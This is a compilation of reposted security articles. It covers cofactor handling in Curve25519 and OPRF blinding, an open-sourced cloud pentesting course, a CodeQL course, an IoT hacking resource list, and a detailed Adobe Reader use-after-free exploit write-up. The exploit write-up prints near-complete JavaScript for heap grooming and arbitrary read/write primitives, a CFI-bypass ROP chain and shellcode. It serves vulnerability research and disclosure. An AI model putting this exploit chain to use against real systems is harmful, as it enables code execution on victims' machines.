Let's again illustrate it with the [0..43] group: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 Recall that the prime-order subgroup is the column on the left, and the low order subgroup is the first line. X25519 is designed in such a way that: The chosen generator of the curve has prime order. The private key is a multiple of the cofactor. For us here, this means our generator is 4, and our private key is a multiple of 4. You can check that multiplying 4 by a multiple of 4 will always yield a multiple of… 4. An element on the left column. (Remember, we're working modulo 44). But that's no good. I want to select a random element on the whole rectangle, not just the left column. If we recall our cofactor lessons, the solution is simple: add a random low order element. The random prime-order element selects the line, and the random low order element selects the column. Adding them together gives us a random element over the whole group. To add icing on the cake, this method is compatible with X25519. Let's take an example. Let's first have a regular key exchange: B = 4 -- Generator of the prime-order group sa = 20 -- Alice's private key sb = 28 -- Bob's private key SA = B.sa = 4.20 = 36 -- Alice's public key SB = B.sb = 4.28 = 24 -- Bob's public key ssa = SB.sa = 24.20 = 40 -- Shared secret (computed by Alice) ssb = SA.sb = 36.28 = 40 -- Shared secret (computed by Bob) As expected of Diffie–Hellman, Alice and Bob compute the same shared secret. Now, what happens if Alice adds a low order element to properly hide her key? Let's say she adds 11 (an element of order 4). LO = 11 -- random low order point HA = SA+LO = 36+11 = 3 -- Alice's "hidden" key ssb = HA.sb = 3.28 = 40 Bob still computes the same shared secret! Which by now should not be a big surprise: scalars that are a multiple of the cofactor absorb the low order component, effectively projecting the result back in the prime order subgroup.
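The exchange above can be replayed mechanically in Python (a sketch using the text's toy group mod 44), confirming that the hidden key leaves the shared secret untouched:

```python
# Toy Diffie-Hellman in the additive group mod 44 (order 4 * 11).
N = 44
B = 4                      # generator of the prime-order subgroup
sa, sb = 20, 28            # private keys: multiples of the cofactor 4

SA = (B * sa) % N          # Alice's public key: 36
SB = (B * sb) % N          # Bob's public key: 24
assert (SB * sa) % N == (SA * sb) % N == 40   # both sides agree

# Alice hides her public key behind a low order element. Bob's clamped
# (multiple-of-4) private key absorbs it: same shared secret.
LO = 11                    # random low order point (order 4)
HA = (SA + LO) % N
assert HA == 3
assert (HA * sb) % N == 40
```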
Applying this to Curve25519 is straightforward: Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Multiply the Curve25519 base point by that scalar. Add a low order point at random. There's a little complication, though. X25519 works on Montgomery curves, which are optimised for an x-coordinate only ladder. That ladder takes advantage of differential addition. Adding a low order point requires arbitrary addition, whose code is neither trivial nor available. We can work around that problem by starting from Edwards25519 instead: Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Multiply the Edwards25519 base point by that scalar. Add a low order point at random. (By the way, be sure the selection of the low order point happens in constant time. Avoid naive array lookup tables.) Convert the result to Curve25519 (clamping guarantees we do not hit the treacherous exceptions of the birational map). The main advantage here is speed: Edwards25519 scalar multiplication by the base point often takes advantage of pre-computed tables, making it much faster than the Montgomery ladder in practice. (Note: pre-computed tables don't really apply to key exchange, which is why X25519 uses the Montgomery ladder instead.) This has a price however: we now depend on EdDSA code, which is not ideal if we don't compute signatures as well. Moreover, some libraries, like TweetNaCl, avoid pre-computed tables to simplify the code. This makes Edwards scalar multiplication slower than the Montgomery ladder. Alternatively, there is a way to stay in Montgomery space: change the base point. Let's try it with the [0..43] group. Instead of using 4 as the base point, we'll add 11, a point whose order is the same as the cofactor (4). Our "dirty" base point is 15 (4+11).
Now let's multiply that by Alice's private key: LO = 11 -- low order point (order 4) B = 4 -- base point (prime order) D = B+LO = 11+4 = 15 -- "dirty" base point sa = 20 -- Alice's private key SA = B.sa = 4.20 = 36 -- Alice's public key HA = D.sa = 15.20 = 36 -- ??? Okay we have a problem: even with the dirty base point, we get the same result. That's because Alice's private key is still a multiple of the cofactor, and absorbs the low order component. But we don't want to absorb it, we want to use it, to select a column at random. Here's the trick: Use a multiple of the cofactor (4) to select the line. Use a multiple of the prime order (11) to select the column. Add those two numbers. Multiply the dirty base point by it. Note the parallel with EdDSA: we were adding points, now we add scalars. But the result is the same: d = 33 -- random multiple of the prime order da = sa+d = 20+33 = 9 -- Alice's "dirty" secret key HA = D.da = 15. 9 = 3 -- Alice's hidden key Note that we can ensure both methods yield the same results by properly decoupling the main factor and the cofactor. Now we can apply the method to Curve25519: Add a low order point of order 8 to the base point. That's our new, "dirty" base point. That can be done offline, and the result hard coded. (I personally added the Edwards25519 base point to a low order Edwards point, then converted the result to Montgomery.) Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Note that if we multiply the dirty base point by that scalar, we'd absorb the low order point all over again. Select a random multiple of the prime order. For Curve25519, that means 0, L, 2L… up to 7L. Add that multiple of L to the clamped random number above. Multiply the resulting scalar by the dirty base point. That way we no longer need EdDSA code. (Note: you can look at actual code in the implementation of the crypto_x25519_dirty_*() functions in my Monocypher cryptographic library.)
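The dirty base point trick is easy to check numerically as well; this sketch (again in the toy group mod 44) replays both the failed first attempt and the scalar-side fix:

```python
# "Dirty" base point in the toy group mod 44 (prime order 11, cofactor 4).
N = 44
B, LO = 4, 11              # prime-order base point, low order point (order 4)
D = (B + LO) % N           # dirty base point: 15
sa = 20                    # clamped private key: a multiple of the cofactor

# First attempt: the clamped key absorbs the low order part, so the dirty
# base point yields the same (non-hidden) public key.
assert (D * sa) % N == (B * sa) % N == 36

# The fix: add a random multiple of the prime order to the scalar.
d = 33                     # random multiple of 11
da = (sa + d) % N          # "dirty" secret key: 9
HA = (D * da) % N          # hidden key: 3
assert (da, HA) == (9, 3)

# Looking left (multiplying by 12) recovers the real public key from HA.
assert (HA * 12) % N == 36
```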
Cofactor and scalar inversion Scalar inversion is useful for exponential blinding to implement Oblivious Pseudo-Random Functions (OPRF). (It will make sense soon, promise). Let's say Alice wants to connect to Bob's server, with her password. To maximise security, they use the latest and greatest in authentication technology (augmented PAKE). One important difference between that and your run of the mill password based authentication, is that Alice doesn't want to transmit her password. And Bob certainly doesn't want to transmit the salt to anyone but Alice: that would be the moral equivalent of publishing his password database. Yet we must end up somehow with Alice knowing something she can use as the salt: a blind salt, which must be a function of the password and the salt only: Blind_salt = f(password, salt) One way to do this is with exponential blinding. We start by having Alice compute a random point on the curve, which is a function of the password: P = Hash_to_point(Hash(password)) That will act as a kind of secret, hidden base point. The Hash_to_point() function can use the Elligator mappings. Note that even though P is the base point multiplied by some scalar, we cannot recover the value of that scalar (if we could, it would mean Elligator mappings could be used to solve discrete logarithm). Now Alice computes an ephemeral key pair with that base point: r = random() R = P . r She sends R to Bob. Note that as far as Bob (or any attacker) is concerned, that point R is completely random, and has no correlation with the password, or its hash. The difficulty of discrete logarithm prevents them from recovering P from R alone. Now Bob uses R to transmit the blind salt: S = R . salt He sends S back to Alice, who then computes the blind salt: Blind_salt = S . (1/r) -- assuming r × (1/r) = 1 Let's go over the whole protocol: P = Hash_to_point(Hash(password)) r = random() R = P . r S = R . salt Blind_salt = S . (1/r) Blind_salt = R . salt . (1/r) Blind_salt = P . r .
salt . (1/r) Blind_salt = P . (r × salt × (1/r)) Blind_salt = P . salt Blind_salt = Hash_to_point(Hash(password)) . salt And voila, our blind salt depends solely on the password and salt. You need to know the password to compute it from the salt, and if Mallory tries to connect to Bob, guessing the wrong password will give her a totally different, unexploitable blind salt. Offline dictionary attack is not possible without having hacked the database first. Now this is all very well, if we are working on a prime-order subgroup. Scalars do have an inverse modulo the order of the curve, hash to point will give us what we want… except nope, our group does not have prime order. We need to deal with the cofactor, somehow. The first problem with the cofactor comes from Hash_to_point(). When Elligator decodes a representative into a point on the curve, that point is not guaranteed to belong to the prime-order subgroup. There's the potential to leak up to 3 bits of information about the password (the cofactor of Curve25519 is 8). Fortunately, the point P is not transmitted over the network. Only R is. And this gives us the opportunity to clear the cofactor: R = P . r If the random scalar r is a multiple of 8, then R will be guaranteed to be on the prime-order subgroup, and we won't leak anything. X25519 has us covered: after clamping, r is a multiple of 8. This guarantee however goes out the window as soon as R is transmitted across the network: Mallory could instead send a bogus key that is not on the prime-order subgroup. (They could also send a point on the twist, but Curve25519 is twist secure, so let's ignore that.) Again though, X25519 takes care of this: S = R . salt Just clamp salt, and we again have a multiple of 8, and S will be guaranteed to be on the prime-order subgroup. Of course, Alice might receive some malicious S instead, so she can't assume it's the correct one. And this time, X25519 does not have us covered: Blind_salt = S . 
(1/r) See, X25519 clamping has a problem: while it clears the cofactor all right, it does not preserve the main factor. Which means clamping neither survives nor preserves algebraic transformations. Inverting r then clamping does not work. Clamping then inverting r does not clear the cofactor. The solution is torsion safe representatives: c = clamp(r) i = 1/c -- modulo L s = i × t -- t%L == 1 and t%8 == 0 Where L is the prime order of the curve. For Curve25519, t = 3×L + 1. The performance trick explained in the torsion safe representatives section applies as expected. (Note: you can look at actual code in the implementation of the crypto_x25519_inverse() function in Monocypher.) Conclusion Phew, done. I confess I didn't think I'd need such a long post. But you get the idea: properly dealing with a cofactor is delicate. It's doable, but the cleaner solution these days is to use the Ristretto Group: you get modern curves and a prime order group. (Discuss on Hacker News, Reddit, Lobsters) Sursa: http://loup-vaillant.fr/tutorials/cofactor
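To close the loop on the blinded-salt protocol, here is a toy replay in the group mod 44, where L = 11 and t = 12 plays the role of 3×L + 1 (t % 11 == 1, t % 4 == 0). All concrete values are chosen for illustration:

```python
# Toy blinded salt (OPRF) in the group mod 44: L = 11, cofactor 4, t = 12.
N, L, T = 44, 11, 12
P_pt = 8                    # stands in for Hash_to_point(Hash(password)); prime order
r = 20                      # Alice's blinding scalar, "clamped" to a multiple of 4
salt = 28                   # Bob's salt, also a multiple of 4

R = (P_pt * r) % N          # Alice -> Bob
S = (R * salt) % N          # Bob -> Alice

i = pow(r, -1, L)           # 1/r, but only modulo the prime order (Python 3.8+)
s = (i * T) % N             # torsion safe representative of the inverse
blind_salt = (S * s) % N
assert blind_salt == (P_pt * salt) % N   # depends on password and salt only

# A malicious S with a low order component is absorbed by the torsion safe
# scalar; the naive inverse i would leak it.
S_evil = (S + 11) % N
assert (S_evil * s) % N == blind_salt
assert (S_evil * i) % N != blind_salt
```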
-
Breaking and Pwning Apps and Servers on AWS and Azure - Free Training Courseware and Labs

Introduction

The world is changing right in front of our eyes. The way we have been learning is going to be radically transformed by the time we have all eradicated COVID-19 from our lives. While we figure out the best way to transfer our knowledge to you, we realise that by the time the world is out of lockdown, a cloud-focussed pentesting training is likely to be obsolete in parts. So, as a contribution to the greater security community, we decided to open-source the complete training.

Hope you enjoy this release and come back to us with questions, comments, feedback, new ideas or anything else you want to let us know! Looking forward to hacking with all of you!

Description

Amazon Web Services (AWS) and Azure run the most popular and widely used cloud infrastructure and services. Security testers, cloud/IT admins and people tasked with DevSecOps need to learn how to effectively attack and test their cloud infrastructure. In this tools-and-techniques-based training we cover attack approaches, creating your attack arsenal in the cloud, and a distilled deep dive into AWS and Azure services and concepts that should be used for security.

The training covers a multitude of scenarios taken from our vulnerability assessment, penetration testing and OSINT engagements, taking the student through the journey of discovery, identification and exploitation of security weaknesses, misconfigurations and poor programming practices that can lead to complete compromise of the cloud infrastructure.

The training is meant to be hands-on, with guided walkthroughs, scenario-based attacks, and coverage of tools that can be used for attacking and auditing. Due to the attack-focused nature of the training, there is not a lot of documentation around security architecture, defence in depth, etc.
Additional references are provided in case further reading is required.

To proceed, you will need:

An AWS account, activated for payments (you should be able to open and view the Services > EC2 page)
An Azure account (you should be able to log in to the Azure console)

About this repo

This repo contains all the material from our 3-day hands-on training that we have delivered at security conferences and to our numerous clients. The primary things in this repo are:

documentation - all documentation in markdown format that is to be used to go through the training
setup-files - files required to create a student virtual machine that will be used to create the cloud labs
extras - any additional files that are relevant during the training

Getting started

Clone this repo
Set up the student VM
Host the documentation locally using gitbook
Follow the docs

Step 1 - Set up the student VM

The documentation to set up your own student virtual machine, which is required for the training, is under documentation/setting-up/setup-student-virtual-machine.md. This needs to be done first.

Step 2 - Documentation

As all documentation is in markdown format, you can use Gitbook to host a local copy while walking through the training. Steps to do this:

install gitbook-cli (npm install gitbook-cli -g)
cd into the documentation folder
gitbook serve
browse to http://localhost:4000

License

Documentation and Gitbook are released under Creative Commons Attribution Share Alike 4.0 International. Lab material, including any code or scripts, is released under the MIT License.

Sursa: https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training
-
TianFu Cup 2019: Adobe Reader Exploitation

Apr 10, 2020 Phan Thanh Duy

Last year, I participated in the TianFu Cup competition in Chengdu, China. The chosen target was Adobe Reader. This post will detail a use-after-free bug of a JSObject. My exploit is not clean and not an optimal solution. I finished this exploit through lots of trial and error. It involves lots of heap shaping code which I no longer remember exactly why it is there. I would highly suggest that you read the full exploit code and do the debugging yourself if necessary. This blog post was written based on a Windows 10 host with Adobe Reader.

Vulnerability

The vulnerability is located in the EScript.api component, which is the binding layer for various JS API calls. First I create an array of Sound objects.

SOUND_SZ = 512
SOUNDS = Array(SOUND_SZ)
for(var i=0; i<512; i++) {
    SOUNDS[i] = this.getSound(i)
    SOUNDS[i].toString()
}

This is what a Sound object looks like in memory. The 2nd dword is a pointer to a JSObject which has elements, slots, shape, fields, etc. The 4th dword is a string indicating the object's type. I'm not sure which version of SpiderMonkey Adobe Reader is using. At first I thought this was a NativeObject, but its fields don't seem to match SpiderMonkey's source code. If you know what this structure is or have a question, please contact me via Twitter.

0:000> dd @eax
088445d8 08479bb0 0c8299e8 00000000 085d41f0
088445e8 0e262b80 0e262f38 00000000 00000000
088445f8 0e2630d0 00000000 00000000 00000000
08844608 00000000 5b8c4400 6d6f4400 00000000
08844618 00000000 00000000
0:000> !heap -p -a @eax
address 088445d8 found in _HEAP @ 4f60000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
088445d0 000a 0000 [00] 088445d8 00048 - (busy)
0:000> da 085d41f0
085d41f0 "Sound"

This 0x48 memory region and its fields are what is going to be freed and reused.
Since AdobeReader.exe is a 32-bit binary, I can heap spray and know exactly where my controlled data is in memory. I could then overwrite this whole memory region with my controlled data and try to find a way to control PC. I failed because I don't really know what all these fields are. I don't have a memory leak. Adobe has CFI. So I turned my attention to the JSObject (2nd dword) instead. Also, being able to fake a JSObject is a very powerful primitive. Unfortunately the 2nd dword is not on the heap. It is in a memory region which is VirtualAlloced when Adobe Reader starts. One important point to notice is that the memory content is not cleared after it is freed.

0:000> !address 0c8299e8
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: <unknown>
Base Address: 0c800000
End Address: 0c900000
Region Size: 00100000 ( 1.000 MB)
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 0c800000
Allocation Protect: 00000004 PAGE_READWRITE
Content source: 1 (target), length: d6618

I realized that ESObjectCreateArrayFromESVals and ESObjectCreate also allocate into this area. I used the currentValueIndices function to call ESObjectCreateArrayFromESVals:

/* prepare array elements buffer */
f = this.addField("f" , "listbox", 0, [0,0,0,0]);
t = Array(32)
for(var i=0; i<32; i++) t[i] = i
f.multipleSelection = 1
f.setItems(t)
f.currentValueIndices = t
// every time currentValueIndices is accessed `ESObjectCreateArrayFromESVals` is called to create a new array.
for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices

Looking at the ESObjectCreateArrayFromESVals return value, we can see that our JSObject 0d2ad1f0 is not on the heap, but its elements buffer at 08c621e8 is.
The ffffff81 is the tag for a number, just as we have ffffff85 for a string and ffffff87 for an object.

0:000> dd @eax
0da91b00 088dfd50 0d2ad1f0 00000001 00000000
0da91b10 00000000 00000000 00000000 00000000
0da91b20 00000000 00000000 00000000 00000000
0da91b30 00000000 00000000 00000000 00000000
0da91b40 00000000 00000000 5b9868c6 88018800
0da91b50 0dbd61d8 537d56f8 00000014 0dbeb41c
0da91b60 0dbd61d8 00000030 089dfbdc 00000001
0da91b70 00000000 00000003 00000000 00000003
0:000> !heap -p -a 0da91b00
address 0da91b00 found in _HEAP @ 5570000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0da91af8 000a 0000 [00] 0da91b00 00048 - (busy)
0:000> dd 0d2ad1f0
0d2ad1f0 0d2883e8 0d225ac0 00000000 08c621e8
0d2ad200 0da91b00 00000000 00000000 00000000
0d2ad210 00000000 00000020 0d227130 0d2250c0
0d2ad220 00000000 553124f8 0da8dfa0 00000000
0d2ad230 00c10003 0d27d180 0d237258 00000000
0d2ad240 0d227130 0d2250c0 00000000 553124f8
0d2ad250 0da8dcd0 00000000 00c10001 0d27d200
0d2ad260 0d237258 00000000 0d227130 0d2250c0
0:000> dd 08c621e8
08c621e8 00000000 ffffff81 00000001 ffffff81
08c621f8 00000002 ffffff81 00000003 ffffff81
08c62208 00000004 ffffff81 00000005 ffffff81
08c62218 00000006 ffffff81 00000007 ffffff81
08c62228 00000008 ffffff81 00000009 ffffff81
08c62238 0000000a ffffff81 0000000b ffffff81
08c62248 0000000c ffffff81 0000000d ffffff81
08c62258 0000000e ffffff81 0000000f ffffff81
0:000> !heap -p -a 08c621e8
address 08c621e8 found in _HEAP @ 5570000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
08c621d0 0023 0000 [00] 08c621d8 00110 - (busy)

So our goal now is to overwrite this elements buffer
to inject a fake Javascript object. This is my plan at this point:

Free the Sound objects.
Try to allocate dense arrays into the freed Sound objects' location using currentValueIndices.
Free the dense arrays.
Try to allocate into the freed elements buffers.
Inject a fake Javascript object.

The code below iterates through the SOUNDS array to free its elements and uses currentValueIndices to reclaim them:

/* free and reclaim sound object */
RECLAIM_SZ = 512
RECLAIMS = Array(RECLAIM_SZ)
THRESHOLD_SZ = 1024*6
NTRY = 3
NOBJ = 8 //18
for(var i=0; i<NOBJ; i++) {
    SOUNDS[i] = null //free one sound object
    gc()
    for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices
    try {
        //if the reclaim succeeds, `this.getSound` returns an array instead and its first element should be 0
        if (this.getSound(i)[0] == 0) {
            RECLAIMS[i] = this.getSound(i)
        } else {
            console.println('RECLAIM SOUND OBJECT FAILED: '+i)
            throw ''
        }
    } catch (err) {
        console.println('RECLAIM SOUND OBJECT FAILED: '+i)
        throw ''
    }
    gc()
}
console.println('RECLAIM SOUND OBJECT SUCCEED')

Next, we will free all the dense arrays and try to allocate back into their elements buffers using TypedArray. I put faked integers with 0x33441122 at the start of the array to check if the reclaim succeeded.
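As an aside, the element-buffer dumps shown earlier are easier to read once you treat them as 32-bit payload/tag pairs. A small throwaway Python helper (my own, purely illustrative, using the tag constants observed in the post) decodes them:

```python
# Decode the 32-bit jsval pairs seen in the element-buffer dumps:
# each element is a payload dword followed by a tag dword.
# The tag constants are the ones observed in the post.
TAGS = {0xffffff81: "number", 0xffffff85: "string", 0xffffff87: "object"}

def decode_elements(dwords):
    """Turn a flat dword list into (type, payload) pairs."""
    return [(TAGS.get(tag, "unknown"), payload)
            for payload, tag in zip(dwords[0::2], dwords[1::2])]

# A few example dwords in the dump format above:
dump = [0x00000000, 0xffffff81, 0x00000001, 0xffffff81,
        0x33441122, 0xffffff81]
print(decode_elements(dump))
```

Writing a number payload with a 0xffffff81 tag, as the reclaim code does, is exactly what makes the marker readable back as the integer 0x33441122.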
The corrupted array with our controlled elements buffer is then put into variable T:

/* free all allocated array objects */
this.removeField("f")
RECLAIMS = null
f = null
FENCES = null //free fence
gc()
for (var j=0; j<8; j++) SOUNDS[j] = this.getSound(j)

/* reclaim freed element buffer */
for(var i=0; i<FREE_110_SZ; i++) {
    FREES_110[i] = new Uint32Array(64)
    FREES_110[i][0] = 0x33441122
    FREES_110[i][1] = 0xffffff81
}
T = null
for(var j=0; j<8; j++) {
    try {
        // if the reclaim succeeds, the first element will be our injected number
        if (SOUNDS[j][0] == 0x33441122) {
            T = SOUNDS[j]
            break
        }
    } catch (err) {}
}
if (T==null) {
    console.println('RECLAIM element buffer FAILED')
    throw ''
} else console.println('RECLAIM element buffer SUCCEED')

From this point, we can put fake Javascript objects into our elements buffer and leak the address of objects assigned to it. The following code is used to find out which TypedArray is our fake elements buffer and to leak its address.

/* create and leak the address of an array buffer */
WRITE_ARRAY = new Uint32Array(8)
T[0] = WRITE_ARRAY
T[1] = 0x11556611
for(var i=0; i<FREE_110_SZ; i++) {
    if (FREES_110[i][0] != 0x33441122) {
        FAKE_ELES = FREES_110[i]
        WRITE_ARRAY_ADDR = FREES_110[i][0]
        console.println('WRITE_ARRAY_ADDR: ' + WRITE_ARRAY_ADDR.toString(16))
        assert(WRITE_ARRAY_ADDR>0)
        break
    } else {
        FREES_110[i] = null
    }
}

Arbitrary Read/Write Primitives

To achieve an arbitrary read primitive, I spray a bunch of fake string objects into the heap, then assign one of them into our elements buffer.
GUESS = 0x20000058 //0x20d00058

/* spray fake strings */
for(var i=0x1100; i<0x1400; i++) {
    var dv = new DataView(SPRAY[i])
    dv.setUint32(0, 0x102, true) //string header
    dv.setUint32(4, GUESS+12, true) //string buffer, point here to leak back idx 0x20000064
    dv.setUint32(8, 0x1f, true) //string length
    dv.setUint32(12, i, true) //index into SPRAY that is at 0x20000058
    delete dv
}
gc()
//app.alert("Create fake string done")

/* point one of our element to fake string */
FAKE_ELES[4] = GUESS
FAKE_ELES[5] = 0xffffff85

/* create aar primitive */
SPRAY_IDX = s2h(T[2])
console.println('SPRAY_IDX: ' + SPRAY_IDX.toString(16))
assert(SPRAY_IDX>=0)
DV = DataView(SPRAY[SPRAY_IDX])
function myread(addr) {
    //change fake string object's buffer to the address we want to read.
    DV.setUint32(4, addr, true)
    return s2h(T[2])
}

Similarly, to achieve arbitrary write, I create a fake TypedArray. I simply copy the WRITE_ARRAY contents and change its SharedArrayRawBuffer pointer.

/* create aaw primitive */
for(var i=0; i<32; i++) {DV.setUint32(i*4+16, myread(WRITE_ARRAY_ADDR+i*4), true)} //copy WRITE_ARRAY
FAKE_ELES[6] = GUESS+0x10
FAKE_ELES[7] = 0xffffff87
function mywrite(addr, val) {
    DV.setUint32(96, addr, true)
    T[3][0] = val
}
//mywrite(0x200000C8, 0x1337)

Gaining Code Execution

With arbitrary read/write primitives, I can leak the base address of EScript.API from the TypedArray object's header. Inside EScript.API there is a very convenient gadget to call VirtualAlloc.

//d8c5e69b5ff1cea53d5df4de62588065 - md5sum of EScript.API
ESCRIPT_BASE = myread(WRITE_ARRAY_ADDR+12) - 0x02784D0 //.data:002784D0 qword_2784D0 dq ?
console.println('ESCRIPT_BASE: '+ ESCRIPT_BASE.toString(16))
assert(ESCRIPT_BASE>0)

Next I leak the base address of AcroForm.API and the address of a CTextField (0x60 in size) object. First allocate a bunch of CTextField objects using addField, then create a string object also with size 0x60 and leak the address of this string (MARK_ADDR).
We can safely assume that these CTextField objects will lie behind our MARK_ADDR. Finally, I walk the heap to look for CTextField::`vftable'.

/* leak .rdata:007A55BC ; const CTextField::`vftable' */
//f9c59c6cf718d1458b4af7bbada75243
for(var i=0; i<32; i++) this.addField(i, "text", 0, [0,0,0,0]);
T[4] = STR_60.toLowerCase()
for(var i=32; i<64; i++) this.addField(i, "text", 0, [0,0,0,0]);
MARK_ADDR = myread(FAKE_ELES[8]+4)
console.println('MARK_ADDR: '+ MARK_ADDR.toString(16))
assert(MARK_ADDR>0)
vftable = 0
while (1) {
    MARK_ADDR += 4
    vftable = myread(MARK_ADDR)
    if ( ((vftable&0xFFFF)==0x55BC) && (((myread(MARK_ADDR+8)&0xff00ffff)>>>0)==0xc0000000)) break
}
console.println('MARK_ADDR: '+ MARK_ADDR.toString(16))
assert(MARK_ADDR>0)

/* leak acroform, icucnv58 base address */
ACROFORM_BASE = vftable-0x07A55BC
console.println('ACROFORM_BASE: ' + ACROFORM_BASE.toString(16))
assert(ACROFORM_BASE>0)

We can then overwrite the CTextField object's vftable to control PC.

Bypassing CFI

With CFI enabled, we cannot use ROP. I wrote a small script to look for any module that doesn't have CFI enabled and is loaded at the time my exploit is running. I found icucnv58.dll.

import pefile
import os

for root, subdirs, files in os.walk(r'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader'):
    for file in files:
        if file.endswith('.dll') or file.endswith('.exe') or file.endswith('.api'):
            fpath = os.path.join(root, file)
            try:
                pe = pefile.PE(fpath, fast_load=1)
            except Exception as e:
                print(e)
                print('error', file)
                continue
            # 0x4000 == IMAGE_DLLCHARACTERISTICS_GUARD_CF
            if (pe.OPTIONAL_HEADER.DllCharacteristics & 0x4000) == 0:
                print(file)

The icucnv58.dll base address can be leaked via AcroForm.API. There are enough gadgets inside icucnv58.dll to perform a stack pivot and ROP.
//a86f5089230164fb6359374e70fe1739 - md5sum of `icucnv58.dll`
r = myread(ACROFORM_BASE+0xBF2E2C)
ICU_BASE = myread(r+16)
console.println('ICU_BASE: ' + ICU_BASE.toString(16))
assert(ICU_BASE>0)
g1 = ICU_BASE + 0x919d4 + 0x1000 //mov esp, ebx ; pop ebx ; ret
g2 = ICU_BASE + 0x73e44 + 0x1000 //in al, 0 ; add byte ptr [eax], al ; add esp, 0x10 ; ret
g3 = ICU_BASE + 0x37e50 + 0x1000 //pop esp;ret

Last Step

Finally, we have everything we need to achieve full code execution. Write the shellcode into memory using the arbitrary write primitive, then call VirtualProtect to enable execute permission. The full exploit code can be found here if you are interested. As a result, my UAF exploit achieved a ~80% success rate. The exploitation takes about 3-5 seconds on average. If multiple retries are required, the exploitation can take a bit more time.

/* copy CTextField vftable */
for(var i=0; i<32; i++) mywrite(GUESS+64+i*4, myread(vftable+i*4))
mywrite(GUESS+64+5*4, g1) //edit one pointer in vftable

/* 1st rop chain */
mywrite(MARK_ADDR+4, g3)
mywrite(MARK_ADDR+8, GUESS+0xbc)

/* 2nd rop chain */
rop = [
    myread(ESCRIPT_BASE + 0x01B0058), //VirtualProtect
    GUESS+0x120, //return address
    GUESS+0x120, //buffer
    0x1000, //sz
    0x40, //new protect
    GUESS-0x20 //old protect
]
for(var i=0; i<rop.length;i++) mywrite(GUESS+0xbc+4*i, rop[i])

//shellcode
shellcode = [835867240, 1667329123, 1415139921, 1686860336, 2339769483, 1980542347, 814448152, 2338274443, 1545566347, 1948196865, 4270543903, 605009708, 390218413, 2168194903, 1768834421, 4035671071, 469892611, 1018101719, 2425393296]
for(var i=0; i<shellcode.length; i++) mywrite(GUESS+0x120+i*4, re(shellcode[i]))

/* overwrite real vftable */
mywrite(MARK_ADDR, GUESS+64)

Finally, with that exploit, we can spawn our Calc.

Sursa: https://starlabs.sg/blog/2020/04/tianfu-cup-2019-adobe-reader-exploitation/
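For readers following along, the six-dword stack layout written by the second chain can be sketched in a few lines of Python (the two addresses below are placeholders of my own, not the real leaked values):

```python
import struct

# Hypothetical leaked addresses, standing in for the real runtime values.
VIRTUALPROTECT = 0x76543210   # resolved via myread() in the exploit
GUESS = 0x20000058            # sprayed buffer address used in the post

# Same 6-dword layout as the `rop` array above: VirtualProtect,
# return address, buffer, size, new protection, old-protect pointer.
rop = [VIRTUALPROTECT, GUESS + 0x120, GUESS + 0x120, 0x1000, 0x40, GUESS - 0x20]
chain = struct.pack("<6I", *rop)  # six little-endian 32-bit dwords

assert len(chain) == 24
assert struct.unpack("<I", chain[:4])[0] == VIRTUALPROTECT
```

Once the pivot gadget points esp at this buffer, the first dword is "returned" into VirtualProtect with the five following dwords serving as its return address and arguments.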
-
CodeQL U-Boot Challenge (C/C++)

The GitHub Training Team

Learn to use CodeQL, a query language that helps find bugs in source code. Find 9 remote code execution vulnerabilities in the open-source project Das U-Boot, and join the growing community of security researchers using CodeQL.

Quickly learn CodeQL, an expressive language for code analysis, which helps you explore source code to find bugs and vulnerabilities. During this beginner-level course, you will learn to write queries in CodeQL and find critical security vulnerabilities that were identified in Das U-Boot, a popular open-source project.

What you'll learn

Upon completion of the course, you'll be able to:

Understand the basic syntax of CodeQL queries
Use the standard CodeQL libraries to write queries and explore code written in C/C++
Use predicates and classes, the building blocks of CodeQL queries, to make your queries more expressive and reusable
Use the CodeQL data flow and taint tracking libraries to write queries that find real security vulnerabilities

What you'll build

You will walk in the steps of our security researchers, and create:

Several CodeQL queries that look for interesting patterns in C/C++ code.
A CodeQL security query that finds 9 critical security vulnerabilities in the Das U-Boot codebase from 2019 (before it was patched!) and can be reused to audit other open-source projects of your choice.

Pre-requisites

Some knowledge of the C language and standard library. A basic knowledge of secure coding practices is useful to understand the context of this course, and all the consequences of the bugs we'll find, but is not mandatory to learn CodeQL. This is a beginner course. No prior knowledge of CodeQL is required.

Audiences

Security researchers
Developers

Sursa: https://lab.github.com/githubtraining/codeql-u-boot-challenge-(cc++)
-
IoT Pentesting 101 && IoT Security 101

Approach Methodology

1. Network
2. Web (Frontend & Backend and Web services)
3. Mobile App (Android & iOS)
4. Wireless Connectivity (Zigbee, WiFi, Bluetooth, etc)
5. Firmware Pentesting (OS of IoT Devices)
6. Hardware Hacking & Fault Injections & SCA Attacks
7. Storage Medium
8. I/O Ports

To see hacked devices

https://blog.exploitee.rs/2018/10/
https://www.exploitee.rs/
https://forum.exploitee.rs/
Your Lenovo Watch X Is Watching You & Sharing What It Learns
Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT
Smart Bulb Offers Light, Color, Music, and… Data Exfiltration?
Besder-IPCamera analysis
Smart Lock
Subaru Head Unit Jailbreak
Jeep Hack

Chat groups for IoT Security

https://t.me/iotsecurity1011
https://www.reddit.com/r/IoTSecurity101/
https://t.me/hardwareHackingBrasil
https://t.me/joinchat/JAMxOg5YzdkGjcF3HmNgQw
https://discord.gg/EH9dxT9

Books For IoT Pentesting

Android Hacker's Handbook
Hacking the Xbox
Car hacker's handbook
IoT Penetration Testing Cookbook
Abusing the Internet of Things
Hardware Hacking: Have Fun while Voiding your Warranty
Linksys WRT54G Ultimate Hacking
Linux Binary Analysis
